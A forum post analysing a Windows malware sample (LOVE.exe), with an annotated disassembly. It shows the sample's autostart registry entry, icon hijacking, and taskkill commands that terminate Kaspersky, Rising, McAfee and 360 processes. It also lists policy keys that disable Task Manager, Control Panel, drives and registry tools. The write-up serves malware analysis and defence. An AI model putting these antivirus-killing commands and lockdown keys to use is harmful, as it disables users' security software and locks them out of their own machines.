This post was last edited by Thend on 2012-8-4 13:42
Basic information
Report title: Analysis of a malicious program    Author: Thend
Report updated: 2012.08.03
Sample discovered: unknown
Sample type: malicious virus
Sample file MD5: c0d9cec618648730f44f2d5a3bd403db
Packer: none    Language: VC++6.0
Systems at risk: Windows
Overview
It adds itself to the registry to start automatically, drops an icon file of its own and sets it as the default icon for every application, and disables and hides most of the computer's functions, so that the machine can no longer be used normally.
Symptoms on the infected system and network
Hidden: all files and folders; Run, Shut Down, Log Off, Search and Log On in the Start menu; disk drives; drives; Folder Options; the IE home page option group; the IE File menu; the IE Favorites bar; Internet Options.
Disabled: Control Panel, Task Manager, drives, printing, IE View Source, IE downloads, the right-click context menu, restarting into DOS mode, the Documents menu, the right mouse button.
Kills all antivirus software. All application icons are changed. TXT and INF files open by default as: view picture.
File system changes
An image named Aver.ico is written into C:\windows\system32\, and two files, del.bat and ddel.bat, are created in the same directory as the main program; at the end all of them are deleted.
Registry changes
These changes are covered directly in the code analysis below; there are a great many, so they are not listed one by one. The main one is: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LOVE.exe SUCCESS "C:\Documents and Settings\Administrator\桌面\LOVE.exe"
That creates an autostart entry~
Analysis of the malicious program itself:
CB /. 55 push ebp ; set a breakpoint at the start of the segment
CC |. 8BEC mov ebp,esp
CE |. 81EC 14000000 sub esp,0x14
D4 |. 68 01030080 push 0x80000301
D9 |. 6A 00 push 0x0
DB |. 68 E8030000 push 0x3E8
E0 |. 68 01000000 push 0x1
E5 |. BB 703E4000 mov ebx,LOVE.00403E70
EA |. E8 64220000 call LOVE.00403353
EF |. 83C4 10 add esp,0x10
F2 |. 68 00000000 push 0x0
F7 |. BB 10354000 mov ebx,LOVE.00403510 ; j
FC |. E8 52220000 call LOVE.00403353
|. 83C4 04 add esp,0x4
|. 8945 FC mov [local.1],eax
|. 68 00000000 push 0x0
C |. BB 30354000 mov ebx,LOVE.00403530 ; j
|. E8 3D220000 call LOVE.00403353 ; load the virus's own file name, LOVE.exe
|. 83C4 04 add esp,0x4
|. 8945 F8 mov [local.2],eax
C |. FF75 F8 push [local.2]
F |. 68 D8994600 push LOVE.004699D8 ; \
|. FF75 FC push [local.1]
|. B9 03000000 mov ecx,0x3
C |. E8 3EFFFFFF call LOVE.0040106F
|> \6A 00 push 0x0
|. 6A 00 push 0x0
B |. 6A 00 push 0x0
D |. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 DA994600 push LOVE.004699DA ; C:\windows\system32\Aver.ico
|. 68 01030080 push 0x80000301
E |. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
A |. 6A 00 push 0x0
C |. 8B45 F4 mov eax,[local.3]
F |. 85C0 test eax,eax
|. 75 05 jnz XLOVE.00401188
|. B8 F7994600 mov eax,LOVE.004699F7
|> 50 push eax
|. 68 04000000 push 0x4
E |. B8 01000000 mov eax,0x1
|. BB 10754400 mov ebx,LOVE.00447510
|. E8 C8210000 call LOVE.00403365 ; writes an image named Aver.ico into the directory C:\windows\system32\
D |. 83C4 34 add esp,0x34
A7 |. 53 push ebx
A8 |. E8 B2210000 call LOVE.0040335F
AD |. 83C4 04 add esp,0x4
B0 |> 68 04000080 push 0x80000004
B5 |. 6A 00 push 0x0
B7 |. 68 DA994600 push LOVE.004699DA ; C:\windows\system32\Aver.ico
BC |. 68 04000080 push 0x80000004
C1 |. 6A 00 push 0x0
C3 |. 68 F8994600 push LOVE.004699F8 ; SOFTWARE\Classes\exefile\DefaultIcon\
C8 |. 68 01030080 push 0x80000301
CD |. 6A 00 push 0x0
CF |. 68 04000000 push 0x4
D4 |. 68 03000000 push 0x3
D9 |. BB 103B4000 mov ebx,LOVE.00403B10
DE |. E8 70210000 call LOVE.00403353 ; sets the default icon for applications to the Aver.ico just written
F0 |. E8 5E210000 call LOVE.00403353 ; load LOVE.exe again
F5 |. 83C4 04 add esp,0x4
F8 |. 8945 FC mov [local.1],eax
FB |. FF75 FC push [local.1]
FE |. 68 1E9A4600 push LOVE.00469A1E ; Software\Microsoft\Windows\CurrentVersion\Run\
|. B9 02000000 mov ecx,0x2
|. E8 62FEFFFF call LOVE.0040106F ; adds LOVE.exe to the startup Run key
FD |. 83C4 04 add esp,0x4
|. 8945 FC mov [local.1],eax
|. 68 4D9A4600 push LOVE.00469A4D ; \del.bat
|. FF75 FC push [local.1]
B |. B9 02000000 mov ecx,0x2
|. E8 5AFDFFFF call LOVE.0040106F ; a del.bat will be created on the desktop shortly
|. 83C4 08 add esp,0x8
|. 8945 F8 mov [local.2],eax
B |. 8B5D FC mov ebx,[local.1]
E |. 85DB test ebx,ebx
|. 74 09 je XLOVE.0040132B
|. 53 push ebx
|. E8 37200000 call LOVE.0040335F
|. 68 799A4600 push LOVE.00469A79 ; \ddel.bat
|. FF75 FC push [local.1]
A |. B9 02000000 mov ecx,0x2
F |. E8 DBFCFFFF call LOVE.0040106F
|. 83C4 08 add esp,0x8
|. 8945 F8 mov [local.2],eax
A |. 8B5D FC mov ebx,[local.1]
D |. 85DB test ebx,ebx
F |. 74 09 je XLOVE.004013AA
A1 |. 53 push ebx
A2 |. E8 B81F0000 call LOVE.0040335F
A7 |. 83C4 04 add esp,0x4
AA |> 68 05000080 push 0x80000005
AF |. 6A 00 push 0x0
B1 |. 68 839A4600 push LOVE.00469A83
B6 |. 68 04000080 push 0x80000004
BB |. 6A 00 push 0x0
BD |. 8B45 F8 mov eax,[local.2]
C0 |. 85C0 test eax,eax
C2 |. 75 05 jnz XLOVE.004013C9
C4 |. B8 F7994600 mov eax,LOVE.004699F7
C9 |> 50 push eax
CA |. 68 02000000 push 0x2
CF |. BB 30374000 mov ebx,LOVE.00403730
D4 |. E8 7A1F0000 call LOVE.00403353 ; creates ddel.bat on the desktop
D9 |. 83C4 1C add esp,0x1C
E4 |. E8 761F0000 call LOVE.0040335F
E9 |. 83C4 04 add esp,0x4
EC |> 68 00000000 push 0x0
F1 |. B8 01000000 mov eax,0x1
F6 |. BB 20764400 mov ebx,LOVE.00447620
FB |. E8 651F0000 call LOVE.00403365 ; the taskbar is gone...
|. 83C4 04 add esp,0x4
|. 68 00000000 push 0x0
|. B8 01000000 mov eax,0x1
D |. BB C0754400 mov ebx,LOVE.004475C0
|. E8 4E1F0000 call LOVE.00403365
|. 83C4 04 add esp,0x4
|. 8945 FC mov [local.1],eax
|. 68 799A4600 push LOVE.00469A79 ; \ddel.bat
B |. FF75 FC push [local.1]
E |. B9 02000000 mov ecx,0x2
|. E8 17FCFFFF call LOVE.0040106F
|. 83C4 08 add esp,0x8
B |. 8945 F8 mov [local.2],eax
E |. 8B5D FC mov ebx,[local.1]
|. 85DB test ebx,ebx
|. 74 09 je XLOVE.0040146E
|. 53 push ebx
|. E8 F41E0000 call LOVE.0040335F
B |. 83C4 04 add esp,0x4
E |> 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
A |. 68 02000080 push 0x80000002
F |. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
B |. 6A 00 push 0x0
D |. 8B45 F8 mov eax,[local.2]
|. 85C0 test eax,eax
|. 75 05 jnz XLOVE.00401499
|. B8 F7994600 mov eax,LOVE.004699F7
|> 50 push eax
A |. 68 03000000 push 0x3
F |. BB 80334000 mov ebx,LOVE.00403380
A4 |. E8 AA1E0000 call LOVE.00403353 ; runs ddel.bat
D2 |. E8 7C1E0000 call LOVE.00403353
D7 |. 83C4 10 add esp,0x10
DA |. 68 01030080 push 0x80000301
DF |. 6A 00 push 0x0
E1 |. 68 01000000 push 0x1
E6 |. 68 02000080 push 0x80000002
EB |. 6A 00 push 0x0
ED |. 68 00000000 push 0x0
F2 |. 68 04000080 push 0x80000004
F7 |. 6A 00 push 0x0
F9 |. 68 DA9A4600 push LOVE.00469ADA ; cmd /c taskkill /f /im Aver.exe
FE |. 68 03000000 push 0x3
|. BB 80334000 mov ebx,LOVE.00403380
|. E8 461E0000 call LOVE.00403353 ; deletes that Aver.ico icon
|. 68 4D9A4600 push LOVE.00469A4D ; \del.bat
A |. FF75 FC push [local.1]
D |. B9 02000000 mov ecx,0x2
|. E8 38FBFFFF call LOVE.0040106F
|. 83C4 08 add esp,0x8
A |. 8945 F8 mov [local.2],eax
D |. 8B5D FC mov ebx,[local.1]
|. 85DB test ebx,ebx
|. 74 09 je XLOVE.0040154D
|. 53 push ebx
|. E8 151E0000 call LOVE.0040335F
A |. 83C4 04 add esp,0x4
D |> 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
|. 68 02000080 push 0x80000002
E |. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
A |. 6A 00 push 0x0
C |. 8B45 F8 mov eax,[local.2]
F |. 85C0 test eax,eax
|. 75 05 jnz XLOVE.00401578
|. B8 F7994600 mov eax,LOVE.004699F7
|> 50 push eax
|. 68 03000000 push 0x3
E |. BB 80334000 mov ebx,LOVE.00403380
|. E8 CB1D0000 call LOVE.00403353 ; runs del.bat and deletes it
|. E8 C71D0000 call LOVE.0040335F
|. 83C4 04 add esp,0x4
B |> 68 04000080 push 0x80000004
A0 |. 6A 00 push 0x0
A2 |. 68 FA9A4600 push LOVE.00469AFA ; 2056年1月1日
A7 |. 68 01000000 push 0x1
AC |. BB B0354000 mov ebx,LOVE.004035B0
B1 |. E8 9D1D0000 call LOVE.00403353
B6 |. 83C4 10 add esp,0x10
B9 |. 68 03000080 push 0x80000003
BE |. 52 push edx
BF |. 50 push eax
C0 |. 68 01000000 push 0x1
C5 |. BB C0364000 mov ebx,LOVE.004036C0
CA |. E8 841D0000 call LOVE.00403353 ; sets your system date to 2056年1月1日 (January 1, 2056)
D2 |. 68 01030080 push 0x80000301
D7 |. 6A 00 push 0x0
D9 |. 68 01000000 push 0x1
DE |. 68 02000080 push 0x80000002
E3 |. 6A 00 push 0x0
E5 |. 68 00000000 push 0x0
EA |. 68 04000080 push 0x80000004
EF |. 6A 00 push 0x0
F1 |. 68 079B4600 push LOVE.00469B07 ; taskkill /f /im kavsvc.exe
F6 |. 68 03000000 push 0x3
FB |. BB 80334000 mov ebx,LOVE.00403380
|. E8 4E1D0000 call LOVE.00403353 ; finds and forcibly terminates Kaspersky
|. 68 01030080 push 0x80000301
D |. 6A 00 push 0x0
F |. 68 01000000 push 0x1
|. 68 02000080 push 0x80000002
|. 6A 00 push 0x0
B |. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 229B4600 push LOVE.00469B22 ; taskkill /f /im KVXP.kxp
C |. 68 03000000 push 0x3
|. BB 80334000 mov ebx,LOVE.00403380
|. E8 181D0000 call LOVE.00403353 ; finds and forcibly terminates the Jiangmin antivirus process
E |. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
A |. 68 02000080 push 0x80000002
F |. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
B |. 6A 00 push 0x0
D |. 68 3B9B4600 push LOVE.00469B3B ; taskkill /f /im Rav.exe
|. 68 03000000 push 0x3
|. BB 80334000 mov ebx,LOVE.00403380
C |. E8 E21C0000 call LOVE.00403353 ; kills Rising
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
B |. 68 01000000 push 0x1
|. 68 02000080 push 0x80000002
|. 6A 00 push 0x0
|. 68 00000000 push 0x0
C |. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 539B4600 push LOVE.00469B53 ; taskkill /f /im Ravmon.exe
|. 68 03000000 push 0x3
D |. BB 80334000 mov ebx,LOVE.00403380
A2 |. E8 AC1C0000 call LOVE.00403353 ; kills Rising's monitor process
AA |. 68 01030080 push 0x80000301
AF |. 6A 00 push 0x0
B1 |. 68 01000000 push 0x1
B6 |. 68 02000080 push 0x80000002
BB |. 6A 00 push 0x0
BD |. 68 00000000 push 0x0
C2 |. 68 04000080 push 0x80000004
C7 |. 6A 00 push 0x0
C9 |. 68 6E9B4600 push LOVE.00469B6E ; taskkill /f /im Mcshield.exe
CE |. 68 03000000 push 0x3
D3 |. BB 80334000 mov ebx,LOVE.00403380
D8 |. E8 761C0000 call LOVE.00403353 ; kills the McAfee VirusScan core process
E0 |. 68 01030080 push 0x80000301
E5 |. 6A 00 push 0x0
E7 |. 68 01000000 push 0x1
EC |. 68 02000080 push 0x80000002
F1 |. 6A 00 push 0x0
F3 |. 68 00000000 push 0x0
F8 |. 68 04000080 push 0x80000004
FD |. 6A 00 push 0x0
FF |. 68 8B9B4600 push LOVE.00469B8B ; taskkill /f /im VsTskMgr.exe
|. 68 03000000 push 0x3
|. BB 80334000 mov ebx,LOVE.00403380
E |. E8 401C0000 call LOVE.00403353 ; kills a McAfee VirusScan component
|. 68 01030080 push 0x80000301
B |. 6A 00 push 0x0
D |. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 A89B4600 push LOVE.00469BA8 ; SOFTWARE\360Safe\safemon\ExecAccess
E |. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 04000000 push 0x4
A |. 68 03000000 push 0x3
F |. BB 103B4000 mov ebx,LOVE.00403B10
|. E8 0A1C0000 call LOVE.00403353
|. 83C4 28 add esp,0x28
C |. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
D |. 6A 00 push 0x0
F |. 68 CC9B4600 push LOVE.00469BCC ; SOFTWARE\360Safe\safemon\MonAccess
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
B |. 68 04000000 push 0x4
|. 68 03000000 push 0x3
|. BB 103B4000 mov ebx,LOVE.00403B10
A |. E8 D41B0000 call LOVE.00403353
F |. 83C4 28 add esp,0x28
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 00000000 push 0x0
E |. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 EF9B4600 push LOVE.00469BEF ; SOFTWARE\360Safe\safemon\SiteAccess
A |. 68 01030080 push 0x80000301
F |. 6A 00 push 0x0
A1 |. 68 04000000 push 0x4
A6 |. 68 03000000 push 0x3
AB |. BB 103B4000 mov ebx,LOVE.00403B10
B0 |. E8 9E1B0000 call LOVE.00403353
B5 |. 83C4 28 add esp,0x28
B8 |. 68 01030080 push 0x80000301
BD |. 6A 00 push 0x0
BF |. 68 00000000 push 0x0
C4 |. 68 04000080 push 0x80000004
C9 |. 6A 00 push 0x0
CB |. 68 139C4600 push LOVE.00469C13 ; SOFTWARE\360Safe\safemon\UDiskAccess
D0 |. 68 01030080 push 0x80000301
D5 |. 6A 00 push 0x0
D7 |. 68 04000000 push 0x4
DC |. 68 03000000 push 0x3
E1 |. BB 103B4000 mov ebx,LOVE.00403B10
E6 |. E8 681B0000 call LOVE.00403353
EB |. 83C4 28 add esp,0x28
EE |. 68 01030080 push 0x80000301
F3 |. 6A 00 push 0x0
F5 |. 68 01000000 push 0x1
FA |. 68 02000080 push 0x80000002
FF |. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
B |. 6A 00 push 0x0
D |. 68 389C4600 push LOVE.00469C38 ; taskkill /f /im 360tray.exe
|. 68 03000000 push 0x3
|. BB 80334000 mov ebx,LOVE.00403380
C |. E8 321B0000 call LOVE.00403353 ; in short, shuts down everything belonging to 360
|. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
B |. 68 549C4600 push LOVE.00469C54 ; jpegfile
|. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 5D9C4600 push LOVE.00469C5D ; .txt\
C |. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
|. 68 03000000 push 0x3
D |. BB 103B4000 mov ebx,LOVE.00403B10
|. E8 FC1A0000 call LOVE.00403353
|. 83C4 28 add esp,0x28
A |. 68 04000080 push 0x80000004
F |. 6A 00 push 0x0
|. 68 549C4600 push LOVE.00469C54 ; jpegfile
|. 68 04000080 push 0x80000004
B |. 6A 00 push 0x0
D |. 68 639C4600 push LOVE.00469C63 ; .inf\
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
E |. 68 03000000 push 0x3
|. BB 103B4000 mov ebx,LOVE.00403B10
|. E8 C61A0000 call LOVE.00403353 ; sets all TXT and INF files to open by default in the picture viewer
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 00000000 push 0x0
C |. 68 04000080 push 0x80000004
A1 |. 6A 00 push 0x0
A3 |. 68 699C4600 push LOVE.00469C69 ; SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
A8 |. 68 01030080 push 0x80000301
AD |. 6A 00 push 0x0
AF |. 68 04000000 push 0x4
B4 |. 68 03000000 push 0x3
B9 |. BB 103B4000 mov ebx,LOVE.00403B10
BE |. E8 901A0000 call LOVE.00403353 ; hides files and folders
C6 |. 68 01030080 push 0x80000301
CB |. 6A 00 push 0x0
CD |. 68 00000000 push 0x0
D2 |. 68 04000080 push 0x80000004
D7 |. 6A 00 push 0x0
D9 |. 68 C89C4600 push LOVE.00469CC8 ; Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
DE |. 68 01030080 push 0x80000301
E3 |. 6A 00 push 0x0
E5 |. 68 03000000 push 0x3
EA |. 68 03000000 push 0x3
EF |. BB 103B4000 mov ebx,LOVE.00403B10
F4 |. E8 5A1A0000 call LOVE.00403353 ; disables Task Manager
FC |. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
|. 68 04000080 push 0x80000004
D |. 6A 00 push 0x0
F |. 68 119D4600 push LOVE.00469D11 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
B |. 68 03000000 push 0x3
|. 68 03000000 push 0x3
|. BB 103B4000 mov ebx,LOVE.00403B10
A |. E8 241A0000 call LOVE.00403353 ; disables Control Panel
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
E |. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 5C9D4600 push LOVE.00469D5C ; Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
A |. 68 01030080 push 0x80000301
F |. 6A 00 push 0x0
|. 68 03000000 push 0x3
|. 68 03000000 push 0x3
B |. BB 103B4000 mov ebx,LOVE.00403B10
|. E8 EE190000 call LOVE.00403353 ; disables the registry tools
|. 68 01030080 push 0x80000301
D |. 6A 00 push 0x0
F |. 68 01000000 push 0x1
|. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
B |. 68 AB9D4600 push LOVE.00469DAB ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 03000000 push 0x3
C |. 68 03000000 push 0x3
|. BB 103B4000 mov ebx,LOVE.00403B10
|. E8 B8190000 call LOVE.00403353 ; hides Run in the Start menu
E |. 68 01030080 push 0x80000301
A3 |. 6A 00 push 0x0
A5 |. 68 01000000 push 0x1
AA |. 68 04000080 push 0x80000004
AF |. 6A 00 push 0x0
B1 |. 68 ED9D4600 push LOVE.00469DED ; SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
B6 |. 68 01030080 push 0x80000301
BB |. 6A 00 push 0x0
BD |. 68 03000000 push 0x3
C2 |. 68 03000000 push 0x3
C7 |. BB 103B4000 mov ebx,LOVE.00403B10
CC |. E8 82190000 call LOVE.00403353 ; disables all disk drives; the disks are not visible anywhere
D4 |. 68 01060080 push 0x80000601
D9 |. 68 FFFFEF41 push 0x41EFFFFF
DE |. 68 0000E0FF push 0xFFE00000
E3 |. 68 04000080 push 0x80000004
E8 |. 6A 00 push 0x0
EA |. 68 379E4600 push LOVE.00469E37 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
EF |. 68 01030080 push 0x80000301
F4 |. 6A 00 push 0x0
F6 |. 68 03000000 push 0x3
FB |. 68 03000000 push 0x3
A00 |. BB 103B4000 mov ebx,LOVE.00403B10
A05 |. E8 49190000 call LOVE.00403353 ; hides all drives
A0D |. 68 01060080 push 0x80000601
A12 |. 68 FFFFEF41 push 0x41EFFFFF
A17 |. 68 0000E0FF push 0xFFE00000
A1C |. 68 04000080 push 0x80000004
A21 |. 6A 00 push 0x0
A23 |. 68 7C9E4600 push LOVE.00469E7C ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
A28 |. 68 01030080 push 0x80000301
A2D |. 6A 00 push 0x0
A2F |. 68 03000000 push 0x3
A34 |. 68 03000000 push 0x3
A39 |. BB 103B4000 mov ebx,LOVE.00403B10
A3E |. E8 10190000 call LOVE.00403353 ; disables all drives
A46 |. 68 01030080 push 0x80000301
A4B |. 6A 00 push 0x0
A4D |. 68 01000000 push 0x1
A52 |. 68 04000080 push 0x80000004
A57 |. 6A 00 push 0x0
A59 |. 68 C69E4600 push LOVE.00469EC6 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
A5E |. 68 01030080 push 0x80000301
A63 |. 6A 00 push 0x0
A65 |. 68 03000000 push 0x3
A6A |. 68 03000000 push 0x3
A6F |. BB 103B4000 mov ebx,LOVE.00403B10
A74 |. E8 DA180000 call LOVE.00403353 ; disables Folder Options
A7C |. 68 01030080 push 0x80000301
A81 |. 6A 00 push 0x0
A83 |. 68 01000000 push 0x1
A88 |. 68 04000080 push 0x80000004
A8D |. 6A 00 push 0x0
A8F |. 68 129F4600 push LOVE.00469F12 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
A94 |. 68 01030080 push 0x80000301
A99 |. 6A 00 push 0x0
A9B |. 68 03000000 push 0x3
AA0 |. 68 03000000 push 0x3
AA5 |. BB 103B4000 mov ebx,LOVE.00403B10
AAA |. E8 A4180000 call LOVE.00403353 ; hides Shut Down in the Start menu
AB2 |. 68 01030080 push 0x80000301
AB7 |. 6A 00 push 0x0
AB9 |. 68 01000000 push 0x1
ABE |. 68 04000080 push 0x80000004
AC3 |. 6A 00 push 0x0
AC5 |. 68 569F4600 push LOVE.00469F56 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
ACA |. 68 01030080 push 0x80000301
ACF |. 6A 00 push 0x0
AD1 |. 68 03000000 push 0x3
AD6 |. 68 03000000 push 0x3
ADB |. BB 103B4000 mov ebx,LOVE.00403B10
AE0 |. E8 6E180000 call LOVE.00403353 ; hides Search in the Start menu
AE8 |. 68 01030080 push 0x80000301
AED |. 6A 00 push 0x0
AEF |. 68 01000000 push 0x1
AF4 |. 68 04000080 push 0x80000004
AF9 |. 6A 00 push 0x0
AFB |. 68 999F4600 push LOVE.00469F99 ; Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage
B00 |. 68 01030080 push 0x80000301
B05 |. 6A 00 push 0x0
B07 |. 68 03000000 push 0x3
B0C |. 68 03000000 push 0x3
B11 |. BB 103B4000 mov ebx,LOVE.00403B10
B16 |. E8 38180000 call LOVE.00403353 ; hides IE's home page option group
B1E |. 68 01030080 push 0x80000301
B23 |. 6A 00 push 0x0
B25 |. 68 01000000 push 0x1
B2A |. 68 04000080 push 0x80000004
B2F |. 6A 00 push 0x0
B31 |. 68 DE9F4600 push LOVE.00469FDE ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
B36 |. 68 01030080 push 0x80000301
B3B |. 6A 00 push 0x0
B3D |. 68 03000000 push 0x3
B42 |. 68 03000000 push 0x3
B47 |. BB 103B4000 mov ebx,LOVE.00403B10
B4C |. E8 02180000 call LOVE.00403353 ; hides the IE File menu
B54 |. 68 01030080 push 0x80000301
B59 |. 6A 00 push 0x0
B5B |. 68 01000000 push 0x1
B60 |. 68 04000080 push 0x80000004
B65 |. 6A 00 push 0x0
B67 |. 68 25A04600 push LOVE.0046A025 ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites
B6C |. 68 01030080 push 0x80000301
B71 |. 6A 00 push 0x0
B73 |. 68 03000000 push 0x3
B78 |. 68 03000000 push 0x3
B7D |. BB 103B4000 mov ebx,LOVE.00403B10
B82 |. E8 CC170000 call LOVE.00403353 ; hides the Favorites option
B8A |. 68 01030080 push 0x80000301
B8F |. 6A 00 push 0x0
B91 |. 68 01000000 push 0x1
B96 |. 68 04000080 push 0x80000004
B9B |. 6A 00 push 0x0
B9D |. 68 6CA04600 push LOVE.0046A06C ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting
BA2 |. 68 01030080 push 0x80000301
BA7 |. 6A 00 push 0x0
BA9 |. 68 03000000 push 0x3
BAE |. 68 03000000 push 0x3
BB3 |. BB 103B4000 mov ebx,LOVE.00403B10
BB8 |. E8 96170000 call LOVE.00403353 ; disables IE printing
BC0 |. 68 01030080 push 0x80000301
BC5 |. 6A 00 push 0x0
BC7 |. 68 01000000 push 0x1
BCC |. 68 04000080 push 0x80000004
BD1 |. 6A 00 push 0x0
BD3 |. 68 B2A04600 push LOVE.0046A0B2 ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions
BD8 |. 68 01030080 push 0x80000301
BDD |. 6A 00 push 0x0
BDF |. 68 03000000 push 0x3
BE4 |. 68 03000000 push 0x3
BE9 |. BB 103B4000 mov ebx,LOVE.00403B10
BEE |. E8 60170000 call LOVE.00403353 ; hides Internet Options
BF6 |. 68 01030080 push 0x80000301
BFB |. 6A 00 push 0x0
BFD |. 68 01000000 push 0x1
C02 |. 68 04000080 push 0x80000004
C07 |. 6A 00 push 0x0
C09 |. 68 FEA04600 push LOVE.0046A0FE ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource
C0E |. 68 01030080 push 0x80000301
C13 |. 6A 00 push 0x0
C15 |. 68 03000000 push 0x3
C1A |. 68 03000000 push 0x3
C1F |. BB 103B4000 mov ebx,LOVE.00403B10
C24 |. E8 2A170000 call LOVE.00403353 ; forbids View Source in IE
C2C |. 68 01030080 push 0x80000301
C31 |. 6A 00 push 0x0
C33 |. 68 03000000 push 0x3
C38 |. 68 04000080 push 0x80000004
C3D |. 6A 00 push 0x0
C3F |. 68 46A14600 push LOVE.0046A146 ; Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
C44 |. 68 01030080 push 0x80000301
C49 |. 6A 00 push 0x0
C4B |. 68 03000000 push 0x3
C50 |. 68 03000000 push 0x3
C55 |. BB 103B4000 mov ebx,LOVE.00403B10
C5A |. E8 F4160000 call LOVE.00403353 ; disables IE downloads
C62 |. 68 01030080 push 0x80000301
C67 |. 6A 00 push 0x0
C69 |. 68 01000000 push 0x1
C6E |. 68 04000080 push 0x80000004
C73 |. 6A 00 push 0x0
C75 |. 68 8FA14600 push LOVE.0046A18F ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu
C7A |. 68 01030080 push 0x80000301
C7F |. 6A 00 push 0x0
C81 |. 68 03000000 push 0x3
C86 |. 68 03000000 push 0x3
C8B |. BB 103B4000 mov ebx,LOVE.00403B10
C90 |. E8 BE160000 call LOVE.00403353 ; disables the right-click context menu
C98 |. 68 01030080 push 0x80000301
C9D |. 6A 00 push 0x0
C9F |. 68 01000000 push 0x1
CA4 |. 68 04000080 push 0x80000004
CA9 |. 6A 00 push 0x0
CAB |. 68 DFA14600 push LOVE.0046A1DF ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
CB0 |. 68 01030080 push 0x80000301
CB5 |. 6A 00 push 0x0
CB7 |. 68 03000000 push 0x3
CBC |. 68 03000000 push 0x3
CC1 |. BB 103B4000 mov ebx,LOVE.00403B10
CC6 |. E8 88160000 call LOVE.00403353 ; forbids restarting into DOS mode
CCE |. 68 01030080 push 0x80000301
CD3 |. 6A 00 push 0x0
CD5 |. 68 01000000 push 0x1
CDA |. 68 04000080 push 0x80000004
CDF |. 6A 00 push 0x0
CE1 |. 68 26A24600 push LOVE.0046A226 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
CE6 |. 68 01030080 push 0x80000301
CEB |. 6A 00 push 0x0
CED |. 68 03000000 push 0x3
CF2 |. 68 03000000 push 0x3
CF7 |. BB 103B4000 mov ebx,LOVE.00403B10
CFC |. E8 52160000 call LOVE.00403353 ; forbids logging off
D04 |. 68 01030080 push 0x80000301
D09 |. 6A 00 push 0x0
D0B |. 68 01000000 push 0x1
D10 |. 68 04000080 push 0x80000004
D15 |. 6A 00 push 0x0
D17 |. 68 6BA24600 push LOVE.0046A26B ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
D1C |. 68 01030080 push 0x80000301
D21 |. 6A 00 push 0x0
D23 |. 68 03000000 push 0x3
D28 |. 68 03000000 push 0x3
D2D |. BB 103B4000 mov ebx,LOVE.00403B10
D32 |. E8 1C160000 call LOVE.00403353 ; disables the Documents menu
There are many more operations, but they are all alike, so they are not listed one by one here; basically they are all simple registry operations. Execution runs down to the following and is then essentially finished:
C9 /. 55 push ebp
CA |. 8BEC mov ebp,esp
CC |. 68 04000080 push 0x80000004
D1 |. 6A 00 push 0x0
D3 |. 68 9FC44600 push LOVE.0046C49F ; LOVE
D8 |. 68 01030080 push 0x80000301
DD |. 6A 00 push 0x0
DF |. 68 00000000 push 0x0
E4 |. 68 04000080 push 0x80000004
E9 |. 6A 00 push 0x0
EB |. 68 A4C44600 push LOVE.0046C4A4 ; 李研我爱你!
F0 |. 68 03000000 push 0x3
